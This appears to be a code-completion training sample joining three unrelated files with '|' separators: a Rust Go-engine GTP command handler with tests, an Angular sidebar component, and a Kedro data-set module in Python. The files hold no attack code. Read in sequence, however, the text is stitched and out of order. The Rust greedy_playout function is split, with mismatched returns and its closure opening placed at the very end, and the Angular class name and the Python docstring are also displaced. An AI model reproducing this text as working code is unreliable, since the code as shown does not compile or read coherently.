}
}
fn greedy_playout(&mut self, board: &Board) -> Result<Board, &'static str> {
let mut finished_board = self.finished_board.clone();
if finished_board.as_ref().map(|f| f.is_err()).unwrap_or(false) {
finished_board = None;
}
| let mut board = board.clone();
let mut to_move = board.to_move();
let search_tree = match mcts::predict(
pool,
Box::new(ScoringSearch::default()),
Box::new(RolloutLimit::new((*config::NUM_ROLLOUT).into())),
None,
&board,
to_move
) {
Some((_value, _index, search_tree)) => search_tree,
None => { return (board, None, p_state); }
};
// before doing a greedy walk, traverse the current best path in any search tree
// we have computed
for index in GreedyPath::new(&search_tree, 8) {
if index != 361 {
board._place(to_move, Point::from_packed_parts(index));
}
to_move = to_move.opposite();
}
// greedy rollout of the rest of the game
let (finished, _rollout) = mcts::greedy_score(
pool.predictor(),
&board,
to_move
);
(finished, Some(original_search_tree), p_state)
})
}).clone();
self.finished_board = Some(result.clone());
result
}
fn process(&mut self, id: Option<usize>, cmd: Command) {
match cmd {
Command::Quit => {}
Command::Pass => {},
Command::ProtocolVersion => { success!(id, "2"); },
Command::Name => {
success!(id, get_name());
},
Command::Version => {
success!(id, get_version());
},
Command::DescribeEngine => {
success!(id, format!(
"{} {}\n{}",
get_name(),
get_version(),
config::get_description()
));
},
Command::BoardSize(size) => {
if size != 19 {
error!(id, "unacceptable size");
} else {
success!(id, "");
}
},
Command::ClearBoard => {
if self.history.len() > 1 {
self.history = vec![Board::new(self.komi)];
self.explain_last_move = String::new();
self.finished_board = None;
self.ponder = PonderService::new(Board::new(self.komi));
}
success!(id, "");
},
Command::Komi(komi) => {
if self.komi != komi {
self.komi = komi;
for board in self.history.iter_mut() {
(*board).set_komi(komi);
}
// restart the pondering service, since we have been thinking
// with the wrong komi.
let board = self.history.last().unwrap().clone();
self.ponder = PonderService::new(board);
}
success!(id, "");
},
Command::Play(color, at_point) => {
let next_board = {
let board = self.history.last().unwrap();
if let Some(at_point) = at_point {
if board.is_valid(color, at_point) {
let mut other = board.clone();
other.place(color, at_point);
self.ponder.forward(color, Some(at_point));
Some(other)
} else {
None
}
} else {
self.ponder.forward(color, None);
Some(board.clone())
}
};
if let Some(next_board) = next_board {
self.history.push(next_board);
success!(id, "");
} else {
error!(id, "illegal move");
}
},
Command::ListCommands => {
success!(id, KNOWN_COMMANDS.join("\n"));
},
Command::KnownCommand(other) => {
success!(id, {
if KNOWN_COMMANDS.iter().any(|&c| other == c) {
"true"
} else {
"false"
}
});
},
Command::ShowBoard => {
let board = self.history.last().unwrap();
success!(id, &format!("\n{}", board));
},
Command::GenMove(color, mode) => {
let start_time = Instant::now();
let at_point = self.generate_move(id, color, &mode);
if !mode.is_regression() {
if let Some(at_point) = at_point {
let mut board = self.history.last().unwrap().clone();
board.place(color, at_point);
self.history.push(board);
}
}
// update the remaining main time, saturating at zero instead of
// overflowing.
let elapsed = start_time.elapsed();
let elapsed_secs = elapsed.as_secs() as f32 + elapsed.subsec_nanos() as f32 / 1e9;
let c = color as usize;
self.time_settings[c].update(elapsed_secs);
},
Command::ExplainLastMove => {
success!(id, self.explain_last_move);
},
Command::FinalScore => {
let board = self.history.last().unwrap().clone();
let result = self.greedy_playout(&board);
if let Ok(finished) = result {
let (black, white) = board.get_guess_score(&finished);
eprintln!("Black: {}", black);
eprintln!("White: {} + {}", white, self.komi);
let black = black as f32;
let white = white as f32 + self.komi;
if black == white {
success!(id, "0");
} else if black > white {
success!(id, &format!("B+{:.1}", black - white));
} else if white > black {
success!(id, &format!("W+{:.1}", white - black));
}
} else {
error!(id, result.err().unwrap());
}
},
Command::FinalStatusList(status) => {
let board = self.history.last().unwrap().clone();
let result = self.greedy_playout(&board);
if let Ok(finished) = result {
let status_list = board.get_stone_status(&finished);
let vertices = status_list.into_iter()
.filter_map(|(index, stone_status)| {
if stone_status.contains(&status) {
Some(format!("{}", Vertex::from(index)))
} else {
None
}
})
.collect::<Vec<String>>();
success!(id, vertices.join(" "));
} else {
error!(id, result.err().unwrap());
}
},
Command::LoadSgf(filename, move_number) => {
if let Ok(file) = File::open(filename) {
let mut buf_reader = BufReader::new(file);
let mut content = vec! [];
if let Err(_reason) = buf_reader.read_to_end(&mut content) {
error!(id, "cannot read file content");
}
self.history = vec! [];
self.explain_last_move = String::new();
self.finished_board = None;
for entry in Sgf::new(&content, self.komi).take(move_number) {
match entry {
Ok(entry) => {
self.history.push(entry.board);
},
Err(_reason) => {
error!(id, "failed to parse file");
return;
}
}
}
// start the pondering agent
let board = self.history.last().unwrap().clone();
self.ponder = PonderService::new(board);
success!(id, "");
} else {
error!(id, "cannot open file");
}
},
Command::Undo => {
if self.history.len() > 1 {
self.history.pop();
// update the ponder state with the new board position
let board = self.history.last().unwrap().clone();
self.explain_last_move = String::new();
self.finished_board = None;
self.ponder = PonderService::new(board);
success!(id, "");
} else {
error!(id, "cannot undo");
}
},
Command::TimeSettingsNone => {
for &c in &[Color::Black, Color::White] {
self.time_settings[c as usize] = Box::new(time_settings::None::new());
}
success!(id, "");
},
Command::TimeSettingsAbsolute(main_time) => {
for &c in &[Color::Black, Color::White] {
self.time_settings[c as usize] = Box::new(time_settings::Absolute::new(main_time));
}
success!(id, "");
},
Command::TimeSettingsByoYomi(main_time, byo_yomi_time, byo_yomi_stones) => {
for &c in &[Color::Black, Color::White] {
self.time_settings[c as usize] = Box::new(time_settings::ByoYomi::new(
main_time,
byo_yomi_time,
byo_yomi_stones
));
}
success!(id, "");
},
Command::TimeSettingsCanadian(main_time, byo_yomi_time, byo_yomi_stones) => {
for &c in &[Color::Black, Color::White] {
self.time_settings[c as usize] = Box::new(time_settings::Canadian::new(
main_time,
byo_yomi_time,
byo_yomi_stones
));
}
success!(id, "");
},
Command::TimeLeft(color, main_time, byo_yomi_stones) => {
let c = color as usize;
self.time_settings[c].time_left(main_time, byo_yomi_stones);
success!(id, "");
},
Command::CpuTime => {
let cpu_time = self.ponder.cpu_time();
                let secs = cpu_time.as_secs() as f64 + cpu_time.subsec_nanos() as f64 / 1e9;
success!(id, format!("{:.4}", secs));
}
}
}
}
/// Returns the name of this engine.
pub fn get_name() -> String {
env::var("DG_NAME").unwrap_or_else(|_| env!("CARGO_PKG_NAME").to_string())
}
/// Returns the version of this engine.
pub fn get_version() -> String {
env::var("DG_VERSION").unwrap_or_else(|_| env!("CARGO_PKG_VERSION").to_string())
}
/// Run the GTP (Go Text Protocol) client that reads from standard input
/// and writes to standard output. This client implements the minimum
/// necessary feature-set of a GTP client.
pub fn run() {
let stdin = ::std::io::stdin();
let stdin_lock = stdin.lock();
let mut gtp = Gtp {
ponder: PonderService::new(Board::new(DEFAULT_KOMI)),
history: vec! [Board::new(DEFAULT_KOMI)],
komi: DEFAULT_KOMI,
explain_last_move: String::new(),
finished_board: None,
time_settings: [
Box::new(time_settings::None::new()),
Box::new(time_settings::None::new()),
Box::new(time_settings::None::new()),
],
};
for line in stdin_lock.lines() {
if let Ok(line) = line {
match Gtp::parse_line(&line) {
Some((id, Command::Quit)) => {
success!(id, "");
break;
},
Some((id, cmd)) => gtp.process(id, cmd),
_ => break
}
} else {
break
}
}
}
#[cfg(test)]
mod tests {
use dg_go::*;
use gtp::*;
#[test]
    fn protocol_version() {
assert_eq!(Gtp::parse_line("1 protocol_version"), Some((Some(1), Command::ProtocolVersion)));
assert_eq!(Gtp::parse_line("protocol_version"), Some((None, Command::ProtocolVersion)));
}
#[test]
fn name() {
assert_eq!(Gtp::parse_line("1 name"), Some((Some(1), Command::Name)));
assert_eq!(Gtp::parse_line("name"), Some((None, Command::Name)));
}
#[test]
fn version() {
assert_eq!(Gtp::parse_line("1 version"), Some((Some(1), Command::Version)));
assert_eq!(Gtp::parse_line("version"), Some((None, Command::Version)));
}
#[test]
fn boardsize() {
assert_eq!(Gtp::parse_line("1 boardsize 7"), Some((Some(1), Command::BoardSize(7))));
assert_eq!(Gtp::parse_line("boardsize 13"), Some((None, Command::BoardSize(13))));
}
#[test]
fn clear_board() {
assert_eq!(Gtp::parse_line("1 clear_board"), Some((Some(1), Command::ClearBoard)));
assert_eq!(Gtp::parse_line("clear_board"), Some((None, Command::ClearBoard)));
}
#[test]
fn komi() {
assert_eq!(Gtp::parse_line("1 komi 0.5"), Some((Some(1), Command::Komi(0.5))));
assert_eq!(Gtp::parse_line("komi 10"), Some((None, Command::Komi(10.0))));
assert_eq!(Gtp::parse_line("komi -7.5"), Some((None, Command::Komi(-7.5))));
}
#[test]
fn play() {
assert_eq!(Gtp::parse_line("1 play b c2"), Some((Some(1), Command::Play(Color::Black, Some(Point::new(2, 1))))));
assert_eq!(Gtp::parse_line("play w a1"), Some((None, Command::Play(Color::White, Some(Point::new(0, 0))))));
}
#[test]
fn list_commands() {
assert_eq!(Gtp::parse_line("1 list_commands"), Some((Some(1), Command::ListCommands)));
assert_eq!(Gtp::parse_line("list_commands"), Some((None, Command::ListCommands)));
}
#[test]
fn known_command() {
assert_eq!(Gtp::parse_line("1 known_command aaaa"), Some((Some(1), Command::KnownCommand("aaaa".to_string()))));
assert_eq!(Gtp::parse_line("known_command genmove"), Some((None, Command::KnownCommand("genmove".to_string()))));
}
#[test]
fn showboard() {
assert_eq!(Gtp::parse_line("1 showboard"), Some((Some(1), Command::ShowBoard)));
assert_eq!(Gtp::parse_line("showboard"), Some((None, Command::ShowBoard)));
}
#[test]
fn genmove() {
assert_eq!(Gtp::parse_line("1 genmove b"), Some((Some(1), Command::GenMove(Color::Black, GenMoveMode::Normal))));
assert_eq!(Gtp::parse_line("genmove w"), Some((None, Command::GenMove(Color::White, GenMoveMode::Normal))));
}
#[test]
fn final_score() {
assert_eq!(Gtp::parse_line("1 final_score"), Some((Some(1), Command::FinalScore)));
assert_eq!(Gtp::parse_line("final_score"), Some((None, Command::FinalScore)));
}
#[test]
fn final_status_list() {
assert_eq!(Gtp::parse_line("1 final_status_list dead"), Some((Some(1), Command::FinalStatusList(StoneStatus::Dead))));
assert_eq!(Gtp::parse_line("final_status_list alive"), Some((None, Command::FinalStatusList(StoneStatus::Alive))));
assert_eq!(Gtp::parse_line("final_status_list dead"), Some((None, Command::FinalStatusList(StoneStatus::Dead))));
assert_eq!(Gtp::parse_line("final_status_list seki"), Some((None, Command::FinalStatusList(StoneStatus::Seki))));
assert_eq!(Gtp::parse_line("final_status_list black_territory"), Some((None, Command::FinalStatusList(StoneStatus::BlackTerritory))));
assert_eq!(Gtp::parse_line("final_status_list white_territory"), Some((None, Command::FinalStatusList(StoneStatus::WhiteTerritory))));
}
#[test]
fn reg_genmove() {
assert_eq!(Gtp::parse_line("1 reg_genmove b"), Some((Some(1), Command::GenMove(Color::Black, GenMoveMode::Regression))));
assert_eq!(Gtp::parse_line("reg_genmove w"), Some((None, Command::GenMove(Color::White, GenMoveMode::Regression))));
}
#[test]
fn kgs_genmove_cleanup() {
assert_eq!(Gtp::parse_line("1 kgs-genmove_cleanup b"), Some((Some(1), Command::GenMove(Color::Black, GenMoveMode::CleanUp))));
assert_eq!(Gtp::parse_line("kgs-genmove_cleanup w"), Some((None, Command::GenMove(Color::White, GenMoveMode::CleanUp))));
}
#[test]
fn loadsgf() {
assert_eq!(Gtp::parse_line("1 loadsgf x.sgf"), Some((Some(1), Command::LoadSgf("x.sgf".into(), ::std::usize::MAX))));
assert_eq!(Gtp::parse_line("loadsgf x.sgf"), Some((None, Command::LoadSgf("x.sgf".into(), ::std::usize::MAX))));
assert_eq!(Gtp::parse_line("loadsgf x/y/z.sgf 120"), Some((None, Command::LoadSgf("x/y/z.sgf".into(), 120))));
}
#[test]
fn undo() {
assert_eq!(Gtp::parse_line("1 undo"), Some((Some(1), Command::Undo)));
assert_eq!(Gtp::parse_line("undo"), Some((None, Command::Undo)));
}
#[test]
fn time_settings() {
assert_eq!(Gtp::parse_line("1 time_settings 0 1 0"), Some((Some(1), Command::TimeSettingsNone)));
assert_eq!(Gtp::parse_line("1 time_settings 30.2 0 0"), Some((Some(1), Command::TimeSettingsAbsolute(30.2))));
assert_eq!(Gtp::parse_line("time_settings 300 3.14 1"), Some((None, Command::TimeSettingsCanadian(300.0, 3.14, 1))));
}
#[test]
fn kgs_time_settings() {
assert_eq!(Gtp::parse_line("1 kgs-time_settings none"), Some((Some(1), Command::TimeSettingsNone)));
assert_eq!(Gtp::parse_line("kgs-time_settings none"), Some((None, Command::TimeSettingsNone)));
assert_eq!(Gtp::parse_line("2 kgs-time_settings absolute 30.2"), Some((Some(2), Command::TimeSettingsAbsolute(30.2))));
assert_eq!(Gtp::parse_line("kgs-time_settings absolute 300"), Some((None, Command::TimeSettingsAbsolute(300.0))));
assert_eq!(Gtp::parse_line("3 kgs-time_settings byoyomi 30.2 0 0"), Some((Some(3), Command::TimeSettingsByoYomi(30.2, 0.0, 0))));
assert_eq!(Gtp::parse_line("kgs-time_settings byoyomi 300 3.14 1"), Some((None, Command::TimeSettingsByoYomi(300.0, 3.14, 1))));
assert_eq!(Gtp::parse_line("4 kgs-time_settings canadian 30.2 1 1"), Some((Some(4), Command::TimeSettingsCanadian(30.2, 1.0, 1))));
assert_eq!(Gtp::parse_line("kgs-time_settings canadian 300 3.14 1"), Some((None, Command::TimeSettingsCanadian(300.0, 3.14, 1))));
}
#[test]
fn time_left() {
assert_eq!(Gtp::parse_line("1 time_left b 3.14 0"), Some((Some(1), Command::TimeLeft(Color::Black, 3.14, 0))));
assert_eq!(Gtp::parse_line("time_left W 278.1 1"), Some((None, Command::TimeLeft(Color::White, 278.1, 1))));
}
#[test]
fn gomill_explain_last_move() {
assert_eq!(Gtp::parse_line("1 gomill-explain_last_move"), Some((Some(1), Command::ExplainLastMove)));
assert_eq!(Gtp::parse_line("gomill-explain_last_move"), Some((None, Command::ExplainLastMove)));
}
#[test]
fn gomill_describe_engine() {
assert_eq!(Gtp::parse_line("1 gomill-describe_engine"), Some((Some(1), Command::DescribeEngine)));
assert_eq!(Gtp::parse_line("gomill-describe_engine"), Some((None, Command::DescribeEngine)));
}
#[test]
fn gomill_cpu_time() {
assert_eq!(Gtp::parse_line("1 gomill-cpu_time"), Some((Some(1), Command::CpuTime)));
assert_eq!(Gtp::parse_line("gomill-cpu_time"), Some((None, Command::CpuTime)));
}
#[test]
fn quit() {
assert_eq!(Gtp::parse_line("1 quit"), Some((Some(1), Command::Quit)));
assert_eq!(Gtp::parse_line("quit"), Some((None, Command::Quit)));
}
#[test]
fn empty() {
assert_eq!(Gtp::parse_line(""), Some((None, Command::Pass)));
}
} | let result = finished_board.get_or_insert_with(|| {
self.ponder.service(|pool, original_search_tree, p_state| {
                    // if the search tree is too small, then expand it before continuing |
sidebar.component.ts | import { Component, Output, EventEmitter, OnInit } from '@angular/core';
import { Router, NavigationEnd } from '@angular/router';
import { TranslateService } from '@ngx-translate/core';
@Component({
selector: 'app-sidebar',
templateUrl: './sidebar.component.html',
styleUrls: ['./sidebar.component.scss']
})
export class | {
isActive: boolean = false;
collapsed: boolean = false;
showMenu: string = '';
pushRightClass: string = 'push-right';
@Output() collapsedEvent = new EventEmitter<boolean>();
constructor(private translate: TranslateService, public router: Router) {
this.translate.addLangs(['en', 'fr', 'ur', 'es', 'it', 'fa', 'de']);
this.translate.setDefaultLang('en');
const browserLang = this.translate.getBrowserLang();
this.translate.use(browserLang.match(/en|fr|ur|es|it|fa|de/) ? browserLang : 'en');
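        // Close the toggled sidebar after navigation on small screens (<= 992px).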
this.router.events.subscribe(val => {
if (
val instanceof NavigationEnd &&
window.innerWidth <= 992 &&
this.isToggled()
) {
this.toggleSidebar();
}
});
}
eventCalled() {
this.isActive = !this.isActive;
}
addExpandClass(element: any) {
if (element === this.showMenu) {
this.showMenu = '0';
} else {
this.showMenu = element;
}
}
toggleCollapsed() {
this.collapsed = !this.collapsed;
this.collapsedEvent.emit(this.collapsed);
}
isToggled(): boolean {
const dom: Element = document.querySelector('body');
return dom.classList.contains(this.pushRightClass);
}
toggleSidebar() {
const dom: any = document.querySelector('body');
dom.classList.toggle(this.pushRightClass);
}
rltAndLtr() {
const dom: any = document.querySelector('body');
dom.classList.toggle('rtl');
}
changeLang(language: string) {
this.translate.use(language);
}
// onLoggedout() {
// localStorage.removeItem('isLoggedin');
// }
}
| SidebarComponent |
core.py | # Copyright 2018-2019 QuantumBlack Visual Analytics Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND
# NONINFRINGEMENT. IN NO EVENT WILL THE LICENSOR OR OTHER CONTRIBUTORS
# BE LIABLE FOR ANY CLAIM, DAMAGES, OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF, OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# The QuantumBlack Visual Analytics Limited ("QuantumBlack") name and logo
# (either separately or in combination, "QuantumBlack Trademarks") are
# trademarks of QuantumBlack. The License does not grant you any right or
# license to the QuantumBlack Trademarks. You may not use the QuantumBlack
# Trademarks or any confusingly similar mark as a trademark for your product,
# or use the QuantumBlack Trademarks in any other manner that might cause
# confusion in the marketplace, including but not limited to in advertising,
# on websites, or on software.
#
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module provides a set of classes which underpin the data loading and
saving functionality provided by ``kedro.io``.
"""
import abc
import copy
import logging
import os
from collections import namedtuple
from datetime import datetime, timezone
from glob import iglob
from pathlib import Path, PurePath
from typing import Any, Callable, Dict, List, Optional, Tuple, Type
from urllib.parse import urlparse
from warnings import warn
from kedro.utils import load_obj
VERSIONED_FLAG_KEY = "versioned"
VERSION_KEY = "version"
class DataSetError(Exception):
"""``DataSetError`` raised by ``AbstractDataSet`` implementations
in case of failure of input/output methods.
``AbstractDataSet`` implementations should provide instructive
information in case of failure.
"""
pass
class DataSetNotFoundError(DataSetError):
"""``DataSetNotFoundError`` raised by ``DataCatalog`` class in case of
trying to use a non-existing data set.
"""
pass
class DataSetAlreadyExistsError(DataSetError):
"""``DataSetAlreadyExistsError`` raised by ``DataCatalog`` class in case
of trying to add a data set which already exists in the ``DataCatalog``.
"""
pass
class VersionNotFoundError(DataSetError):
"""``VersionNotFoundError`` raised by ``AbstractVersionedDataSet`` implementations
in case of no load versions available for the data set.
"""
pass
class AbstractDataSet(abc.ABC):
"""``AbstractDataSet`` is the base class for all data set implementations.
All data set implementations should extend this abstract class
and implement the methods marked as abstract.
Example:
::
>>> from kedro.io import AbstractDataSet
>>> import pandas as pd
>>>
>>> class MyOwnDataSet(AbstractDataSet):
>>> def __init__(self, param1, param2):
>>> self._param1 = param1
>>> self._param2 = param2
>>>
>>> def _load(self) -> pd.DataFrame:
>>> print("Dummy load: {}".format(self._param1))
>>> return pd.DataFrame()
>>>
>>> def _save(self, df: pd.DataFrame) -> None:
>>> print("Dummy save: {}".format(self._param2))
>>>
>>> def _describe(self):
>>> return dict(param1=self._param1, param2=self._param2)
"""
@classmethod
def from_config(
cls: Type,
name: str,
config: Dict[str, Any],
load_version: str = None,
save_version: str = None,
) -> "AbstractDataSet":
"""Create a data set instance using the configuration provided.
Args:
name: Data set name.
config: Data set config dictionary.
load_version: Version string to be used for ``load`` operation if
the data set is versioned. Has no effect on the data set
if versioning was not enabled.
save_version: Version string to be used for ``save`` operation if
the data set is versioned. Has no effect on the data set
if versioning was not enabled.
Returns:
An instance of an ``AbstractDataSet`` subclass.
Raises:
DataSetError: When the function fails to create the data set
from its config.
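        Example:
        ::
            >>> # A hypothetical catalog entry, assuming ``MyOwnDataSet`` from the
            >>> # class-level example is importable as ``my_project.io.MyOwnDataSet``:
            >>> data_set = AbstractDataSet.from_config(
            >>>     name="my_data",
            >>>     config={"type": "my_project.io.MyOwnDataSet",
            >>>             "param1": 1, "param2": 2},
            >>> )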
"""
try:
class_obj, config = parse_dataset_definition(
config, load_version, save_version
)
except Exception as ex:
raise DataSetError(
"An exception occurred when parsing config "
"for DataSet `{}`:\n{}".format(name, str(ex))
)
try:
data_set = class_obj(**config) # type: ignore
except TypeError as err:
raise DataSetError(
"\n{}.\nDataSet '{}' must only contain "
"arguments valid for the constructor "
"of `{}.{}`.".format(
str(err), name, class_obj.__module__, class_obj.__qualname__
)
)
except Exception as err:
raise DataSetError(
"\n{}.\nFailed to instantiate DataSet "
"'{}' of type `{}.{}`.".format(
str(err), name, class_obj.__module__, class_obj.__qualname__
)
)
return data_set
@property
def _logger(self) -> logging.Logger:
return logging.getLogger(__name__)
def get_last_load_version(self) -> Optional[str]:
"""Versioned datasets should override this property to return last loaded
version"""
# pylint: disable=no-self-use
return None # pragma: no cover
def load(self) -> Any:
"""Loads data by delegation to the provided load method.
Returns:
Data returned by the provided load method.
Raises:
DataSetError: When underlying load method raises error.
"""
self._logger.debug("Loading %s", str(self))
try:
return self._load()
except DataSetError:
raise
except Exception as exc:
# This exception handling is by design as the composed data sets
# can throw any type of exception.
message = "Failed while loading data from data set {}.\n{}".format(
str(self), str(exc)
)
raise DataSetError(message) from exc
def get_last_save_version(self) -> Optional[str]:
"""Versioned datasets should override this property to return last saved
version."""
# pylint: disable=no-self-use
return None # pragma: no cover
def save(self, data: Any) -> None:
"""Saves data by delegation to the provided save method.
Args:
data: the value to be saved by provided save method.
Raises:
DataSetError: when underlying save method raises error.
"""
if data is None:
raise DataSetError("Saving `None` to a `DataSet` is not allowed")
try:
self._logger.debug("Saving %s", str(self))
self._save(data)
except DataSetError:
raise
except Exception as exc:
message = "Failed while saving data to data set {}.\n{}".format(
str(self), str(exc)
)
raise DataSetError(message) from exc
def __str__(self):
def _to_str(obj, is_root=False):
"""Returns a string representation where
1. The root level (i.e. the DataSet.__init__ arguments) are
formatted like DataSet(key=value).
2. Dictionaries have the keys alphabetically sorted recursively.
3. Empty dictionaries and None values are not shown.
"""
fmt = "{}={}" if is_root else "'{}': {}" # 1
if isinstance(obj, dict):
sorted_dict = sorted(obj.items(), key=lambda pair: str(pair[0])) # 2
text = ", ".join(
fmt.format(key, _to_str(value)) # 2
for key, value in sorted_dict
if value or isinstance(value, bool)
) # 3
return text if is_root else "{" + text + "}" # 1
# not a dictionary
return str(obj)
return "{}({})".format(type(self).__name__, _to_str(self._describe(), True))
@abc.abstractmethod
def _load(self) -> Any:
        raise NotImplementedError(
            "`{}` is a subclass of AbstractDataSet and "
            "it must implement the `_load` method".format(self.__class__.__name__)
)
@abc.abstractmethod
def _save(self, data: Any) -> None:
        raise NotImplementedError(
            "`{}` is a subclass of AbstractDataSet and "
            "it must implement the `_save` method".format(self.__class__.__name__)
)
@abc.abstractmethod
def _describe(self) -> Dict[str, Any]:
        raise NotImplementedError(
            "`{}` is a subclass of AbstractDataSet and "
            "it must implement the `_describe` method".format(self.__class__.__name__)
)
def exists(self) -> bool:
"""Checks whether a data set's output already exists by calling
the provided _exists() method.
Returns:
Flag indicating whether the output already exists.
Raises:
DataSetError: when underlying exists method raises error.
"""
try:
self._logger.debug("Checking whether target of %s exists", str(self))
return self._exists()
except Exception as exc:
message = "Failed during exists check for data set {}.\n{}".format(
str(self), str(exc)
)
raise DataSetError(message) from exc
def _exists(self) -> bool:
self._logger.warning(
"`exists()` not implemented for `%s`. Assuming output does not exist.",
self.__class__.__name__,
)
return False
def release(self) -> None:
"""Release any cached data.
Raises:
DataSetError: when underlying exists method raises error.
"""
try:
self._logger.debug("Releasing %s", str(self))
self._release()
except Exception as exc:
message = "Failed during release for data set {}.\n{}".format(
str(self), str(exc)
)
raise DataSetError(message) from exc
def _release(self) -> None:
pass
def generate_timestamp() -> str:
"""Generate the timestamp to be used by versioning.
Returns:
String representation of the current timestamp.
"""
current_ts = datetime.now(tz=timezone.utc)
fmt = (
"{d.year:04d}-{d.month:02d}-{d.day:02d}T{d.hour:02d}"
".{d.minute:02d}.{d.second:02d}.{ms:03d}Z"
)
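    # e.g. "2019-03-11T01.54.30.123Z" (UTC, millisecond precision)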
return fmt.format(d=current_ts, ms=current_ts.microsecond // 1000)
class Version(namedtuple("Version", ["load", "save"])):
"""This namedtuple is used to provide load and save versions for versioned
data sets. If ``Version.load`` is None, then the latest available version
is loaded. If ``Version.save`` is None, then save version is formatted as
YYYY-MM-DDThh.mm.ss.sssZ of the current timestamp.
"""
__slots__ = ()
CONSISTENCY_WARNING = (
"Save version `{}` did not match load version `{}` for {}. This is strongly "
"discouraged due to inconsistencies it may cause between `save` and "
"`load` operations. Please refrain from setting exact load version for "
"intermediate data sets where possible to avoid this warning."
)
def parse_dataset_definition(
config: Dict[str, Any], load_version: str = None, save_version: str = None
) -> Tuple[Type[AbstractDataSet], Dict]:
|
def _local_exists(filepath: str) -> bool:
filepath = Path(filepath)
return filepath.exists() or any(par.is_file() for par in filepath.parents)
def is_remote_path(filepath: str) -> bool:
"""Check if the given path looks like a remote URL (has scheme)."""
# Get rid of Windows-specific "C:\" start,
# which is treated as a URL scheme.
_, filepath = os.path.splitdrive(filepath)
return bool(urlparse(filepath).scheme)
class AbstractVersionedDataSet(AbstractDataSet, abc.ABC):
"""
``AbstractVersionedDataSet`` is the base class for all versioned data set
implementations. All data sets that implement versioning should extend this
abstract class and implement the methods marked as abstract.
Example:
::
>>> from kedro.io import AbstractVersionedDataSet
>>> import pandas as pd
>>>
>>>
>>> class MyOwnDataSet(AbstractVersionedDataSet):
>>> def __init__(self, param1, param2, filepath, version):
>>> super().__init__(filepath, version)
>>> self._param1 = param1
>>> self._param2 = param2
>>>
>>> def _load(self) -> pd.DataFrame:
>>> load_path = self._get_load_path()
>>> return pd.read_csv(load_path)
>>>
>>> def _save(self, df: pd.DataFrame) -> None:
>>> save_path = self._get_save_path()
>>> df.to_csv(str(save_path))
>>>
>>> def _exists(self) -> bool:
>>> path = self._get_load_path()
>>> return path.is_file()
>>>
>>> def _describe(self):
>>> return dict(version=self._version, param1=self._param1, param2=self._param2)
"""
# pylint: disable=abstract-method
def __init__(
self,
filepath: PurePath,
version: Optional[Version],
exists_function: Callable[[str], bool] = None,
glob_function: Callable[[str], List[str]] = None,
):
"""Creates a new instance of ``AbstractVersionedDataSet``.
Args:
filepath: Path to file.
version: If specified, should be an instance of
``kedro.io.core.Version``. If its ``load`` attribute is
None, the latest version will be loaded. If its ``save``
attribute is None, save version will be autogenerated.
exists_function: Function that is used for determining whether
a path exists in a filesystem.
glob_function: Function that is used for finding all paths
in a filesystem, which match a given pattern.
"""
self._filepath = filepath
self._version = version
self._exists_function = exists_function or _local_exists
self._glob_function = glob_function or iglob
self._last_load_version = None # type: Optional[str]
self._last_save_version = None # type: Optional[str]
def get_last_load_version(self) -> Optional[str]:
return self._last_load_version
def _lookup_load_version(self) -> Optional[str]:
if not self._version:
return None
if self._version.load:
return self._version.load
# When load version is unpinned, fetch the most recent existing
# version from the given path
pattern = str(self._get_versioned_path("*"))
version_paths = sorted(self._glob_function(pattern), reverse=True)
most_recent = next(
(path for path in version_paths if self._exists_function(path)), None
)
if not most_recent:
raise VersionNotFoundError(
"Did not find any versions for {}".format(str(self))
)
return PurePath(most_recent).parent.name
def _get_load_path(self) -> PurePath:
if not self._version:
# When versioning is disabled, load from original filepath
return self._filepath
load_version = self._last_load_version or self._lookup_load_version()
return self._get_versioned_path(load_version) # type: ignore
def get_last_save_version(self) -> Optional[str]:
return self._last_save_version
def _lookup_save_version(self) -> Optional[str]:
if not self._version:
return None
return self._version.save or generate_timestamp()
def _get_save_path(self) -> PurePath:
if not self._version:
# When versioning is disabled, return original filepath
return self._filepath
save_version = self._last_save_version or self._lookup_save_version()
versioned_path = self._get_versioned_path(save_version) # type: ignore
if self._exists_function(str(versioned_path)):
raise DataSetError(
"Save path `{}` for {} must not exist if versioning "
"is enabled.".format(versioned_path, str(self))
)
return versioned_path
def _get_versioned_path(self, version: str) -> PurePath:
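        # Versioned layout is <filepath>/<version>/<filename>, e.g.
        # data/01_raw/cars.csv/2019-03-11T01.54.30.123Z/cars.csv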
return self._filepath / version / self._filepath.name
def load(self) -> Any:
self._last_load_version = self._lookup_load_version()
return super().load()
def save(self, data: Any) -> None:
self._last_save_version = self._lookup_save_version()
super().save(data)
load_version = self._lookup_load_version()
if load_version != self._last_save_version:
warn(
CONSISTENCY_WARNING.format(
self._last_save_version, load_version, str(self)
)
)
def exists(self) -> bool:
"""Checks whether a data set's output already exists by calling
the provided _exists() method.
Returns:
Flag indicating whether the output already exists.
Raises:
DataSetError: when underlying exists method raises error.
"""
self._logger.debug("Checking whether target of %s exists", str(self))
try:
return self._exists()
except VersionNotFoundError:
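            # no versions have been saved yet, so the data set does not exist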
return False
except Exception as exc:
message = "Failed during exists check for data set {}.\n{}".format(
str(self), str(exc)
)
raise DataSetError(message) from exc
| """Parse and instantiate a dataset class using the configuration provided.
Args:
config: Data set config dictionary. It *must* contain the `type` key
with fully qualified class name.
load_version: Version string to be used for ``load`` operation if
the data set is versioned. Has no effect on the data set
if versioning was not enabled.
save_version: Version string to be used for ``save`` operation if
the data set is versioned. Has no effect on the data set
if versioning was not enabled.
Raises:
DataSetError: If the function fails to parse the configuration provided.
Returns:
2-tuple: (Dataset class object, configuration dictionary)
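    Example:
    ::
        >>> # ``MemoryDataSet`` is resolved against the default ``kedro.io`` module
        >>> class_obj, conf = parse_dataset_definition({"type": "MemoryDataSet"})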
"""
save_version = save_version or generate_timestamp()
config = copy.deepcopy(config)
if "type" not in config:
raise DataSetError("`type` is missing from DataSet catalog configuration")
class_obj = config.pop("type")
if isinstance(class_obj, str):
try:
class_obj = load_obj(class_obj, "kedro.io")
except ImportError:
raise DataSetError(
